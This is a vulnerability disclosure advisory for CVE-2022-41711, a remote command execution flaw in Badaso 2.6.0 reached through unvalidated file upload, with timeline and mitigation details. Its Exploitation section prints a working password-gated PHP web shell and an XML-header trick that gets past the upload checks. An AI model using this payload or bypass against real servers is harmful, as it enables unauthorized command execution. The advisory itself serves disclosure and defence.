Badaso 2.6.0 - Remote Command Execution

Summary

NameBadaso 2.6.0 - RCE
Code name
ProductBadaso
Affected versionsVersion 2.6.0
StatePublic
Release date2022-10-18

Vulnerability

KindRemote command execution
Rule
RemoteYes
CVSSv3.1 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv3.1 Base Score10.0
Exploit availableYes
CVE ID(s)

Description

Badaso version 2.6.0 allows an unauthenticated remote attacker to execute arbitrary code remotely on the server. This is possible because the application does not properly validate the data uploaded by users.

Vulnerability

This vulnerability occurs because the application does not correctly validate files uploaded by users. Thanks to this, we uploaded a file with malicious PHP code, instead of an image file.

Exploitation

To exploit this vulnerability, the following file must be sent to the server:

exploit.php

<?xml version="1.0" standalone="no"?> <?php if($_POST && $_POST['password']==="AGSH635479302H235") { echo system($_POST['cmd']); } ?>

It is important to put an XML header before the malicious code to bypass security controls.

Evidence of exploitation

RCE-badaso

image

Our security policy

We have reserved the CVE-2022-41711 to refer to this issue from now on.

System Information

  • Version: Badaso 2.6.0

  • Operating System: GNU/Linux

Mitigation

An updated version of Badaso is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/uasoft-indonesia/badaso

Issue https://github.com/uasoft-indonesia/badaso/issues/802

Timeline

Time-lapse-logo

2022-10-05

Vulnerability discovered.

Time-lapse-logo

2022-10-05

Vendor contacted.

Time-lapse-logo

2022-10-05

Vendor replied acknowledging the report.

Time-lapse-logo

2022-10-05

Vendor Confirmed the vulnerability.

Time-lapse-logo

2022-10-11

Vulnerability patched.

Time-lapse-logo

2022-10-18

Public Disclosure.

Fluid Logo Footer

Hacking software for over 20 years

Fluid Attacks tests applications and other systems, covering all software development stages. Our team assists clients in quickly identifying and managing vulnerabilities to reduce the risk of incidents and deploy secure technology.

Copyright © 0 Fluid Attacks. We hack your software. All rights reserved.